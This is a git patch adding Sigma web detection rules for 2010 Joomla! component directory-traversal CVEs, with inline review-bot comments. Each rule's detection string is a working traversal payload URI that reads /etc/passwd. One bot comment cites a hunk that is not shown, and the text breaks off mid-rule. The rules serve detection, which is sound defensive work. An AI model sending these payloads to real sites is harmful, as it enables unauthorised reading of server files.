+ for tag in tags:
+ if tag.startswith("attack."):
+ continue
+ elif tag.startswith("car."):
+ continue
+ elif tag.startswith("cve."):
+ print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag))
+ files_with_incorrect_tags.append(file)
+ else:
+ print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag))
+ files_with_incorrect_tags.append(file)
 self.assertEqual(files_with_incorrect_tags, [], Fore.RED + "There are rules with incorrect/unknown MITRE Tags. (please inform us about new tags that are not yet supported in our tests) and check the correct tags here: https://attack.mitre.org/ ")
From 6019871a7873f0cb03ee3f23ce6ee06d3b32987a Mon Sep 17 00:00:00 2001
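Review bot: The new `else` branch now fails the suite on every tag outside the hard-coded `attack.`/`car.`/`cve.` prefixes, but `tag.startswith` assumes each list item is a `str`; if `get_rule_part` hands back the raw YAML value, an unquoted numeric tag would be parsed as a number and raise `AttributeError` instead of being reported, so `tag = str(tag)` at the top of the loop (or an `isinstance` check) would keep the report path intact. The two `continue` branches can be one allowlist test, `if tag.startswith(("attack.", "car.")): continue`, with the tuple hoisted to a named constant so that a new namespace is added in one place rather than by commenting tags out of rules. The `cve.` message still reads "but is it a references"; "but should list it under references (https://nvd.nist.gov/)" would be clearer. The enclosing test method starts outside the hunk.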
From: pbssubhash Date: Wed, 25 Aug 2021 20:14:36 +0530 Subject: [PATCH 0576/1367] Adding Rules - Web 2010 --- rules/web/web_cve_CVE-2010-0943.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-0944.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1314.yaml | 23 +++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1345.yaml | 23 +++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1353.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1474.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1475.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1495.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1532.yaml | 24 ++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1533.yaml | 23 +++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1535.yaml | 24 ++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1602.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1657.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1718.yaml | 24 ++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1722.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1875.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1953.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1955.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1979.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1983.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2033.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2036.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2259.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2307.yaml | 27 +++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2682.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2861.yaml | 27 +++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-3426.yaml | 23 +++++++++++++++++++++++ rules/web/web_cve_CVE-2010-4231.yaml | 25 
+++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-4617.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-5278.yaml | 26 ++++++++++++++++++++++++++ 30 files changed, 750 insertions(+) create mode 100644 rules/web/web_cve_CVE-2010-0943.yaml create mode 100644 rules/web/web_cve_CVE-2010-0944.yaml create mode 100644 rules/web/web_cve_CVE-2010-1314.yaml create mode 100644 rules/web/web_cve_CVE-2010-1345.yaml create mode 100644 rules/web/web_cve_CVE-2010-1353.yaml create mode 100644 rules/web/web_cve_CVE-2010-1474.yaml create mode 100644 rules/web/web_cve_CVE-2010-1475.yaml create mode 100644 rules/web/web_cve_CVE-2010-1495.yaml create mode 100644 rules/web/web_cve_CVE-2010-1532.yaml create mode 100644 rules/web/web_cve_CVE-2010-1533.yaml create mode 100644 rules/web/web_cve_CVE-2010-1535.yaml create mode 100644 rules/web/web_cve_CVE-2010-1602.yaml create mode 100644 rules/web/web_cve_CVE-2010-1657.yaml create mode 100644 rules/web/web_cve_CVE-2010-1718.yaml create mode 100644 rules/web/web_cve_CVE-2010-1722.yaml create mode 100644 rules/web/web_cve_CVE-2010-1875.yaml create mode 100644 rules/web/web_cve_CVE-2010-1953.yaml create mode 100644 rules/web/web_cve_CVE-2010-1955.yaml create mode 100644 rules/web/web_cve_CVE-2010-1979.yaml create mode 100644 rules/web/web_cve_CVE-2010-1983.yaml create mode 100644 rules/web/web_cve_CVE-2010-2033.yaml create mode 100644 rules/web/web_cve_CVE-2010-2036.yaml create mode 100644 rules/web/web_cve_CVE-2010-2259.yaml create mode 100644 rules/web/web_cve_CVE-2010-2307.yaml create mode 100644 rules/web/web_cve_CVE-2010-2682.yaml create mode 100644 rules/web/web_cve_CVE-2010-2861.yaml create mode 100644 rules/web/web_cve_CVE-2010-3426.yaml create mode 100644 rules/web/web_cve_CVE-2010-4231.yaml create mode 100644 rules/web/web_cve_CVE-2010-4617.yaml create mode 100644 rules/web/web_cve_CVE-2010-5278.yaml 
diff --git a/rules/web/web_cve_CVE-2010-0943.yaml b/rules/web/web_cve_CVE-2010-0943.yaml
new file mode 100644
index 00000000..e90c6aab
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-0943.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal
+id: a7b7151c-99e5-444b-89db-df927d1055ed
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
+ component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter in a jashowcase action to index.php.
+references:
+- https://www.exploit-db.com/exploits/11090
+- https://www.cvedetails.com/cve/CVE-2010-0943
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-0944.yaml b/rules/web/web_cve_CVE-2010-0944.yaml
new file mode 100644
index 00000000..22499499
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-0944.yaml
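Review bot: The new rule has no `logsource:` block, so a backend has nothing to map `c-uri` against; the other rules in this diff carry one (the compliance hunk above shows `logsource:` with `product: netflow`), and a web rule would want `logsource:` with `category: webserver`. The file also diverges from the field names and formats the rest of the repository uses on this page — `Author:` vs `author:`, `false_positives:` vs `falsepositives:`, `date: 25/08/2021` vs the `YYYY/MM/DD` form (`date: 2021/01/22`), and a `.yaml` extension where sibling rules use `.yml` — so the rule loader or the repository's rule tests may skip or reject it on any of these. The selection fires only on the exact Nuclei payload string (fixed `../` depth, trailing `%00`), which ties coverage to that one scanner template; a second selection keyed on `option=com_jashowcase` together with a traversal marker would make the rule useful beyond it. The same points apply to all 30 files in this commit (CVE-2010-0944 through CVE-2010-5278).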
@@ -0,0 +1,25 @@ +title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal +id: c3a5750d-210b-4a15-b1f7-17444d634a6a +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JCollection (com_jcollection) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/11088 +- https://www.cvedetails.com/cve/CVE-2010-0944 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1314.yaml b/rules/web/web_cve_CVE-2010-1314.yaml new file mode 100644 index 00000000..324e4a66 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1314.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion +id: 226602ff-06ce-4173-9b87-7c2d62b4b3a4 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) + component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical 
diff --git a/rules/web/web_cve_CVE-2010-1345.yaml b/rules/web/web_cve_CVE-2010-1345.yaml new file mode 100644 index 00000000..187b3f3c --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1345.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion +id: ff1015cf-e991-458c-a999-67e30fd34f9a +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) + component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via + a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1353.yaml b/rules/web/web_cve_CVE-2010-1353.yaml new file mode 100644 index 00000000..77a9f02b --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1353.yaml 
@@ -0,0 +1,25 @@ +title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion +id: dee9b22f-1e7c-44ec-ad34-555ea35c0a6e +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the view parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12068 +- https://www.cvedetails.com/cve/CVE-2010-1353 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1474.yaml b/rules/web/web_cve_CVE-2010-1474.yaml new file mode 100644 index 00000000..f0c21085 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1474.yaml 
@@ -0,0 +1,26 @@ +title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion +id: b2a1a114-6d92-4cce-8b53-b82518abf56c +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) + component 1.5.x for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/12182 +- https://www.cvedetails.com/cve/CVE-2010-1474 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1475.yaml b/rules/web/web_cve_CVE-2010-1475.yaml new file mode 100644 index 00000000..b4e9e4f1 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1475.yaml 
@@ -0,0 +1,25 @@
+title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File
+ Inclusion
+id: 6d1e0e6f-4e68-4f1c-8f60-467521d0c25b
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive)
+ component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1495.yaml b/rules/web/web_cve_CVE-2010-1495.yaml
new file mode 100644
index 00000000..a3b4cdc1
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1495.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion
+id: 6edfc22e-9b33-43c4-8872-eb41d6cfb5bd
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Matamko (com_matamko) component
+ 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)
+ in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12286
+- https://www.cvedetails.com/cve/CVE-2010-1495
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
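Review bot: The `c-uri|contains` value in CVE-2010-1475 has a doubled `==` after `controller`, which the description's own wording ("in the controller parameter") does not support; `|contains` would then only match a request carrying that exact typo and the URI the rule is meant to catch would go undetected. Confirm against the referenced template and change the value to use a single `&controller=../` with the rest of the string unchanged. The `logsource`, field-name and date-format points raised on CVE-2010-0943 apply here and to CVE-2010-1495 in the same hunk line.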
diff --git a/rules/web/web_cve_CVE-2010-1532.yaml b/rules/web/web_cve_CVE-2010-1532.yaml new file mode 100644 index 00000000..b3df21b9 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1532.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion +id: d1890f8a-ef82-4d0c-a686-bace99bd54f2 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) + component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1533.yaml b/rules/web/web_cve_CVE-2010-1533.yaml new file mode 100644 index 00000000..53b10518 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1533.yaml 
@@ -0,0 +1,23 @@ +title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion +id: 432ecccc-dfd6-4c0f-8173-0f57f8eafe46 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the TweetLA (com_tweetla) component + 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1535.yaml b/rules/web/web_cve_CVE-2010-1535.yaml new file mode 100644 index 00000000..f5d20bce --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1535.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion +id: 36a64564-5ba1-40ff-a85f-6a0a11215c35 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) + component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1602.yaml b/rules/web/web_cve_CVE-2010-1602.yaml new file mode 100644 index 00000000..e57fe8fe 
--- /dev/null +++ b/rules/web/web_cve_CVE-2010-1602.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion +id: e9519f69-b3b8-4695-88bb-5bf2d34e40aa +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) + component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/12283 +- https://www.cvedetails.com/cve/CVE-2010-1602 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1657.yaml b/rules/web/web_cve_CVE-2010-1657.yaml new file mode 100644 index 00000000..614266e8 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1657.yaml 
@@ -0,0 +1,25 @@ +title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion +id: b32928f2-521b-4e3b-b34c-cb49617727ca +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the SmartSite (com_smartsite) component + 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12428 +- https://www.cvedetails.com/cve/CVE-2010-1657 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1718.yaml b/rules/web/web_cve_CVE-2010-1718.yaml new file mode 100644 index 00000000..ae4b53e3 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1718.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion +id: 60f6f1f4-0312-4416-bb31-fd376a59ce7b +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in archeryscores.php in the Archery + Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to + include and execute arbitrary local files via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical 
diff --git a/rules/web/web_cve_CVE-2010-1722.yaml b/rules/web/web_cve_CVE-2010-1722.yaml new file mode 100644 index 00000000..f8de4108 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1722.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion +id: e33e435a-51b1-416d-b0f3-0965a0b73af9 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Online Market (com_market) component + 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12177 +- https://www.cvedetails.com/cve/CVE-2010-1722 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1875.yaml b/rules/web/web_cve_CVE-2010-1875.yaml new file mode 100644 index 00000000..48c7d585 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1875.yaml 
@@ -0,0 +1,26 @@ +title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion +id: d989a93e-8f69-4419-876d-12bd5f9bfc19 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Real Estate Property (com_properties) + component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files + and possibly have unspecified other impact via a .. (dot dot) in the controller + parameter to index.php. +references: +- https://www.exploit-db.com/exploits/11851 +- https://www.cvedetails.com/cve/CVE-2010-1875 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1953.yaml b/rules/web/web_cve_CVE-2010-1953.yaml new file mode 100644 index 00000000..aed73819 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1953.yaml 
@@ -0,0 +1,25 @@ +title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion +id: 88a112bd-6581-4492-8d76-5c984d738c09 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) + component 1.0 for Joomla! allows remote attackers to read arbitrary files via a + .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12288 +- https://www.cvedetails.com/cve/CVE-2010-1953 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1955.yaml b/rules/web/web_cve_CVE-2010-1955.yaml new file mode 100644 index 00000000..c74eeaa7 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1955.yaml 
@@ -0,0 +1,25 @@ +title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion +id: 5eeaa5a1-e6d1-46f8-9bf3-ef141d6733f9 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) + component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via + a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12238 +- https://www.cvedetails.com/cve/CVE-2010-1955 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1979.yaml b/rules/web/web_cve_CVE-2010-1979.yaml new file mode 100644 index 00000000..ddd153dc --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1979.yaml 
@@ -0,0 +1,25 @@ +title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion +id: 0221e773-afea-48bf-b3b2-dd60ed509720 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) + component build 880 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12088 +- https://www.cvedetails.com/cve/CVE-2010-1979 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1983.yaml b/rules/web/web_cve_CVE-2010-1983.yaml new file mode 100644 index 00000000..2d8c8113 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1983.yaml 
@@ -0,0 +1,25 @@
+title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion
+id: b205e0d0-b61a-4a7a-a8db-45225cad643f
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
+ component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary
+ files via a .. (dot dot) in the view parameter to index.php
+references:
+- https://www.exploit-db.com/exploits/12055
+- https://www.cvedetails.com/cve/CVE-2010-1983
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2033.yaml b/rules/web/web_cve_CVE-2010-2033.yaml
new file mode 100644
index 00000000..de4c9b39
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2033.yaml
@@ -0,0 +1,26 @@
+title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion
+id: d61b5ebd-9dc8-4dc5-b377-5e7cabfde00e
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
+ component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
+ have unspecified other impact via a .. (dot dot) in the controller parameter to
+ index.php.
+references:
+- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
+- https://www.cvedetails.com/cve/CVE-2010-2033
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2036.yaml b/rules/web/web_cve_CVE-2010-2036.yaml
new file mode 100644
index 00000000..b3132266
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2036.yaml
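Review bot: The description does not match the rule: it describes the Percha Fields Attach component (`com_perchafieldsattach`, 1.x), which is CVE-2010-2036 in the next file, while the title, the packetstorm reference and the detection string all refer to Percha Categories Tree 0.6 (`com_perchacategoriestree`). The description appears to have been copied from the CVE-2010-2036 rule and should be rewritten for the Categories Tree component so an analyst triaging a hit is not pointed at the wrong advisory.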
@@ -0,0 +1,26 @@
+title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
+id: 1859e4d6-2965-4bee-897f-bded883e7364
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
+ component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
+ have unspecified other impact via a .. (dot dot) in the controller parameter to
+ index.php.
+references:
+- https://www.exploit-db.com/exploits/34004
+- https://www.cvedetails.com/cve/CVE-2010-2036
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
